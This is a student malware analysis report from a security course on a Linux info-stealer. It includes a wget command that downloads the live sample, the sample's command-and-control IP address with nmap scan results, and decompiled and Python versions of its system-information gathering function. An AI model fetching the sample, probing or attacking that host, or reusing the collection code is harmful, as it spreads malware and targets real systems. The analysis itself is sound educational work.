Class 7 Malware Analysis

![Malware Analysis Report](https://hackmd.io/_uploads/BJyhyikMkx.svg) [toc] # What ? This is a malware analysis report from this [Excercise](https://docs.google.com/document/d/1SB9yzvTTLzN-Re-sgegL2xsgimOM9g2SvDauj_K-WJo/edit?tab=t.0#heading=h.yijxjuljd1pa) - Class 7 LATERAL MOVEMENT, VIRTUALIZATION, AND THREAT INTELLIGENCE As described in the following video - [Class 7 - Dr.S.García: Introduction to Computer Security (B4M36BSY)](https://youtu.be/mguCzX7Ynv0?si=8ahnR9oyViQeOkY7&t=7315) ## Abbreviations used in this note Abb | Expansion :---: | :---: MW | Malware MWA | Malware Analysis # HUH ? The MW which used during the execrcise has been downloaded and a simple analysis on it has been done. ## Setup 1. Downoad the MW ```sh= wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1gZo-841lZ83Lb8qYKGpoMZH1VhSL92EB" -O suspiciousfile ``` :::danger Pushing the MW to github will lead your account to be flagged or disabled ::: 2. Run analysis inside a docker container # Findings ## Infection Flow Diagram ```mermaid sequenceDiagram participant Victim participant Server Victim->>Server: Gather System Info and send Server->>Victim: Get data and stream random info Victim->>Server: Binary in infinite loop until terminated ``` ## Summary Description | Details :---: | :---: Type | Linux Binary Encryption | None Activity | Info Stealer ## Static Analysis > A variety of open source tools were used for these findings ### Encryption None ![1](https://hackmd.io/_uploads/SJfMI8yz1g.jpg) - C program - With No Encryption ### IP found in binary - `139.59.213.4` ```js= # Nmap 7.80 scan initiated Fri Nov 8 17:10:57 2024 as: nmap -script default -oN n.txt 139.59.213.4 Nmap scan report for 139.59.213.4 Host is up (0.14s latency). Not shown: 995 closed ports PORT STATE SERVICE 22/tcp open ssh 25/tcp filtered smtp 465/tcp filtered smtps 587/tcp filtered submission 4444/tcp open krb524 # Nmap done at Fri Nov 8 17:11:10 2024 -- 1 IP address (1 host up) scanned in 13.83 seconds ``` More detailed nmap vulnerability scan - https://pastebin.com/raw/ZLLVtVAD - The following discussion is based on sections extracted from here. From the above scan we can see that there is a vulnerable OpenSSH Server ```js= PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0) ``` - But after several attempts it appears that a connection was no possible ```js= 4444/tcp open krb524? | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, LDAPSearchReq, NCP, SSLSessionReq, SSLv23SessionReq, WMSRequest: | netstat -anp | GenericLines, NotesRPC: | whoami | GetRequest, NULL, SMBProgNeg, TerminalServerCookie: | hostname | HTTPOptions, Kerberos, LANDesk-RC, RPCCheck, SIPOptions, TLSSessionReq, ms-sql-s, oracle-tns: | uptime | Help, JavaRMI, LDAPBindReq: | cat /proc/meminfo | TerminalServer, X11Probe: | uname -a | afp, giop: |_ ifconfig ``` - L1 - Indicates its a kreberos authentication server. It is possible to telnet to this server, but there are delayed responses. with random text beinge generated - L2-L16 - These strings get printed to the console when connected to the server, entering these commands doent seem to do anything. :::warning Due to the random text being generated. This ip maybe a honeypot. Since connecting to it is possible, but no further actions could be performed ::: ### Functions ![2](https://hackmd.io/_uploads/rJeUPIkzkx.jpg) **Important Files Description** File | Function :--: | :--: `_start` | Entry point into the function `main` | Main Function called on entry `gather_system_info` | Info Stealing Function `execute_and_send_command` | Function that steals information and send to the server `139.59.213.4`, which then intiates a stream of information to send back. :::info gather_system_info is the information stealing function ::: ```rust= // Pseudo Code - Generated from Ghidra void gather_system_info(char *param_1,size_t param_2) { __uid_t __uid; passwd *ppVar1; char *param8; long in_FS_OFFSET; utsname local_198; long local_10; local_10 = *(long *)(in_FS_OFFSET + 0x28); uname(&local_198); __uid = getuid(); ppVar1 = getpwuid(__uid); if (ppVar1 == (passwd *)0x0) { param8 = "unknown"; } else { param8 = ppVar1->pw_name; } snprintf(param_1,param_2,"OS:%s|Node:%s|Release:%s|Version:%s|Machine:%s|User:%s", local_198.sysname,local_198.nodename,local_198.release,local_198.version, local_198.machine,param8); if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) { /* WARNING: Subroutine does not return */ __stack_chk_fail(); } return; } ``` - L24 - the types of information that is being gathered from the system and sent to the server - Variable | Information :---: | :---: `sysname` | Operating System Name `nodename` | Network node hostname `release` | OS Release Info `version` | OS Vesion level `Machine` | Machine hardware Identifier #### Python Representation For testin the equivalent in python would be ```py= import os import platform import pwd def gather_system_info(): # Gather system information using platform module sysname = platform.system() # Equivalent to `uname.sysname` nodename = platform.node() # Equivalent to `uname.nodename` release = platform.release() # Equivalent to `uname.release` version = platform.version() # Equivalent to `uname.version` machine = platform.machine() # Equivalent to `uname.machine` # Get the current user ID and username user_id = os.getuid() # Equivalent to `getuid()` try: username = pwd.getpwuid(user_id).pw_name except KeyError: username = "unknown" # Format the system information string system_info = f"OS:{sysname}|Node:{nodename}|Release:{release}|Version:{version}|Machine:{machine}|User:{username}" return system_info # Example usage info = gather_system_info() print(info) ```